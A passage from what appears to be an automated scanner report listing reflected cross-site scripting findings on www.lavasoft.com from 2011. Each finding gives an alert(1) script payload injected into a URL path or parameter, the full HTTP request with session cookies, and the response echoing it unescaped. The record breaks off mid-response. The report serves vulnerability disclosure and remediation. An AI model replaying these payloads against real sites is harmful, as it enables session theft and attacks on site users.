Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:18 GMT; path=/
Set-Cookie: country_name=f3dbcdd2fdcc54fecafaf6b0; expires=Sun, 06-Nov-2011 12:27:18 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10640
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css48fb6'><script>alert(1)</script>1d5f7324bb1/products.css?38180ee2adff20f2975ec0c47808bb0e'>
...[SNIP]...

1.157. http://www.lavasoft.com/css/products.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/products.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9b696'><script>alert(1)</script>1a92eb01410 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/products.css9b696'><script>alert(1)</script>1a92eb01410?38180ee2adff20f2975ec0c47808bb0e HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:19 GMT; path=/
Set-Cookie: country_name=f3dbcdd2fdcc54fecafaf6b0; expires=Sun, 06-Nov-2011 12:27:19 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10640
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css/products.css9b696'><script>alert(1)</script>1a92eb01410?38180ee2adff20f2975ec0c47808bb0e'>
...[SNIP]...

1.158. http://www.lavasoft.com/css/selector.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/selector.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 85071'><script>alert(1)</script>dbb72c49636 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css85071'><script>alert(1)</script>dbb72c49636/selector.css?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:12 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:12 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10640
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css85071'><script>alert(1)</script>dbb72c49636/selector.css?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.159. http://www.lavasoft.com/css/selector.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/selector.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload faae5'><script>alert(1)</script>8317c119fa0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/selector.cssfaae5'><script>alert(1)</script>8317c119fa0?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:13 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:13 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10640
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css/selector.cssfaae5'><script>alert(1)</script>8317c119fa0?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.160. http://www.lavasoft.com/css/singlecolumn.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/singlecolumn.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9f0b3'><script>alert(1)</script>f688db7b221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css9f0b3'><script>alert(1)</script>f688db7b221/singlecolumn.css?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:13 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:13 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10644
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css9f0b3'><script>alert(1)</script>f688db7b221/singlecolumn.css?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.161. http://www.lavasoft.com/css/singlecolumn.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /css/singlecolumn.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e1dcf'><script>alert(1)</script>61823a841a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/singlecolumn.csse1dcf'><script>alert(1)</script>61823a841a?0a9d783e70d0dd6d9179e6fcfa7fe43d HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:13 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:27:13 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10643
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/css/singlecolumn.csse1dcf'><script>alert(1)</script>61823a841a?0a9d783e70d0dd6d9179e6fcfa7fe43d'>
...[SNIP]...

1.162. http://www.lavasoft.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9fbd0'><script>alert(1)</script>fa4d70e4e78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico9fbd0'><script>alert(1)</script>fa4d70e4e78 HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; __utma=105290910.1894501030.1315416415.1315416415.1315416415.1; __utmb=105290910.1.10.1315416415; __utmc=105290910; __utmz=105290910.1315416415.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/; lang_code=US; country_name=United+States

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:23 GMT; path=/
Set-Cookie: country_name=United+Statesf3dbcdd25c35ee7f50f33c20; expires=Sun, 06-Nov-2011 12:27:23 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10602
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/favicon.ico9fbd0'><script>alert(1)</script>fa4d70e4e78'>
...[SNIP]...

1.163. http://www.lavasoft.com/img/gradient_black_dgrey_v_100.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /img/gradient_black_dgrey_v_100.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 81900'><script>alert(1)</script>5e10506606b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img81900'><script>alert(1)</script>5e10506606b/gradient_black_dgrey_v_100.png HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States; __utma=105290910.1894501030.1315416415.1315416415.1315416415.1; __utmb=105290910.1.10.1315416415; __utmc=105290910; __utmz=105290910.1315416415.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:24 GMT; path=/
Set-Cookie: country_name=United+Statesf0935%00%0D%0Ab78d89cedcf; expires=Sun, 06-Nov-2011 12:27:24 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10625
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/img81900'><script>alert(1)</script>5e10506606b/gradient_black_dgrey_v_100.png'>
...[SNIP]...

1.164. http://www.lavasoft.com/img/gradient_black_dgrey_v_100.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /img/gradient_black_dgrey_v_100.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ac96e'><script>alert(1)</script>945c7d74830 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/gradient_black_dgrey_v_100.pngac96e'><script>alert(1)</script>945c7d74830 HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States; __utma=105290910.1894501030.1315416415.1315416415.1315416415.1; __utmb=105290910.1.10.1315416415; __utmc=105290910; __utmz=105290910.1315416415.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:25 GMT; path=/
Set-Cookie: country_name=United+Statesf0935%00%0D%0Ab78d89cedcf; expires=Sun, 06-Nov-2011 12:27:25 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10625
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/img/gradient_black_dgrey_v_100.pngac96e'><script>alert(1)</script>945c7d74830'>
...[SNIP]...

1.165. http://www.lavasoft.com/img/gradient_black_dgrey_v_100.png [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /img/gradient_black_dgrey_v_100.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 54fe6'><script>alert(1)</script>460b86e196a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/gradient_black_dgrey_v_100.png?54fe6'><script>alert(1)</script>460b86e196a=1 HTTP/1.1
Host: www.lavasoft.com
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tsf4mgboa46r7hqjoftc5h9te0; lang_code=US; country_name=United+States; __utma=105290910.1894501030.1315416415.1315416415.1315416415.1; __utmb=105290910.1.10.1315416415; __utmc=105290910; __utmz=105290910.1315416415.1.1.utmcsr=allthingsd.com|utmccn=(referral)|utmcmd=referral|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:27:24 GMT; path=/
Set-Cookie: country_name=United+Statesf0935%00%0D%0Ab78d89cedcf; expires=Sun, 06-Nov-2011 12:27:24 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10628
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/img/gradient_black_dgrey_v_100.png?54fe6'><script>alert(1)</script>460b86e196a=1'>
...[SNIP]...

1.166. http://www.lavasoft.com/mylavasoft/login [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2b048'><script>alert(1)</script>28f692a0d15a4a8ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /mylavasoft2b048'><script>alert(1)</script>28f692a0d15a4a8ea/login?empty=/?domain=4b22e&email=&op=Get+new+password&form_build_id=form-378338bb4a4188f5405b0cba0089b8e9&form_id=lava_user_password_reminder_form HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.2.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:39:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:39:12 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:39:12 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10754
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft2b048'><script>alert(1)</script>28f692a0d15a4a8ea/login?empty=/?domain=4b22e&email=&op=Get+new+password&form_build_id=form-378338bb4a4188f5405b0cba0089b8e9&form_id=lava_user_password_reminder_form'>
...[SNIP]...

1.167. http://www.lavasoft.com/mylavasoft/login [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8f69f'><script>alert(1)</script>6a1505323de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft8f69f'><script>alert(1)</script>6a1505323de/login?destination=/?domain=4b22e HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/?domain=4b22e%27%3E%3Cscript%3Eprompt(document.location)%3C/script%3E8a5fb0d26dc
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:38:33 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:38:33 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10634
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft8f69f'><script>alert(1)</script>6a1505323de/login?destination=/?domain=4b22e'>
...[SNIP]...

1.168. http://www.lavasoft.com/mylavasoft/login [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/login

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5f879'><script>alert(1)</script>e4fcb70e95babf13 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /mylavasoft/login5f879'><script>alert(1)</script>e4fcb70e95babf13?empty=/?domain=4b22e&email=&op=Get+new+password&form_build_id=form-378338bb4a4188f5405b0cba0089b8e9&form_id=lava_user_password_reminder_form HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.2.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:39:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
